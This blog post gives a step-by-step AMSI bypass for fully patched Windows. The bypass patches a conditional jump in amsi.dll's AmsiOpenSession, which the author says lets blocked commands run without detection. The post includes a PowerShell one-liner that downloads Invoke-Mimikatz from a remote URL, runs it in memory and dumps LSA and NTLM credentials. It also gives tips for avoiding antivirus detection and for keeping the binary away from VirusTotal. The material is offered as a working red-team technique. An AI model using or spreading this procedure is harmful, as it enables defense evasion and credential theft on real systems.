AMSI Bypass New Way 2023
this blog introduces you to how to bypass AMSI (antimalware scan interface)
This bypass can break over the period of time , so keep that in mind .
Hello friend !! This is SURYA DEV SINGH, back here again with a new blog, In this blog, we will be discussing a new technique and a flaw found in asmi.dll , which leads to the bypass of the antimalware scan interface which we can abuse to run Mimikatz in a real red team operation on fully patched windows. but before diving deep let’s start from the very basics!!
What is AMSI?
from Microsoft “The Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product that’s present on a machine. AMSI provides enhanced malware protection for your end-users and their data, applications, and workloads.”
In Simple words, we can say that AMSI is implemented by Microsoft that uses to scan program execution of the program in memory. It’s also implemented in PowerShell also, which means any command and script we run in PowerShell, is passed first to AMSI first for detection and then to the main antivirus engine.
now in order to bypass this, we need to understand the basics of how things are working under the hood !!
What is amsi.dll?
The amsi.dll file provides the implementation of the AMSI feature in Windows. The DLL file contains the functions that are used to initialize, configure, and use the AMSI feature in Windows. The file is also responsible for loading and unloading the AMSI engine.
AMSI AmsiOpenSession Bypass
AmsiOpenSession is a function provided by the amsi.dll file as part of the Anti-Malware Scan Interface (AMSI) in Windows. The AmsiOpenSession function is used to create a new AMSI session for a calling application.
The AmsiOpenSession function can be used to configure the AMSI session by setting the session’s context and behavior. For example, an application can set the session’s context to specify the content type of the data being scanned, such as script or binary data.
Let's first disassemble the AmsiOpenSession function from amsi.dll :
there is a test instruction, it basically performs bitwise AND operation between it and itself (rcx , rcx), setting the zero flag (ZF=1) if the result is zero.
if the Zero flag is set, it will follow JE (jump equal) instruction 0x180008244 (which is an error branch) indicating 0x80070057
now, what if we can modify the JE instruction to JNE (jump not equal), the error branch will never look !! , Thus allowing us to run any command without getting flagged !!
there is a project by TheD1rkMtr called AMSI_patch, which does the same thing. I have also created the same project with the same idea but little different implementation (all credits and kudos goes to TheD1rkMtr) you can find the code here :
Steps to Bypass AMSI :
- Download
amsibypass.exefile from the above project, you can also build your own with.slnthe file. (note: this binary can be flagged by AV over a period of time.) - after having
amsibypass.exefile, Open PowerShell with admin privilege and execution policy disable :
powershell -ep bypass -nop3. now, you run can run it in your current PowerShell session, or another PowerShell session, but you will need the PID of that session. like so :
4. Now, as you can see it says AMSI PATCHED !! , We can try to run malicious commands like invoke-mimikatz . Let's directly download and run the invoke-mimikatz script from nishang’s GitHub
here we have used the PowerShell command :
PS C:\Users\szero\Desktop> IEX(New-Object Net.Webclient).DownloadString("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1") ; Invoke-Mimikatz -Command '"lsadump::lsa /patch"' ; exithere we download the mimikatz directly from GitHub, load it into memory, execute it, and then end the PowerShell process. we have used exit it at the end so that it works with OPSEC.
If we don’t end (exit) the PowerShell process which is loading mimikatz, then it will get flagged, although it will show the NTLM dump. This is due to a heuristic scan of memory and process by an antivirus product. which will flag it as malicious.
now if we just add an exit at the end, of the command, which will drop out the PowerShell session immediately after executing and dumping NTLM hashes, then nothing is detected !!
now, nothing is getting detected !!
again, this bypass can break over a period of time, but for now, it's working very perfectly. make sure not to upload amsibypass.exe to virus total !! the original code and concept credit goes to: https://github.com/TheD1rkMtr
THANK YOU FOR READING MY ARTICLE !! 🙌🏻🙌🏻
please support me by following me on medium and other social platforms:
https://twitter.com/kryolite_secure/
https://www.instagram.com/kryolite_security/
https://github.com/surya-dev-singh/
you guys can subscribe to me 🙌on YouTube: I post walkthroughs and other ethical hacking-related videos there.
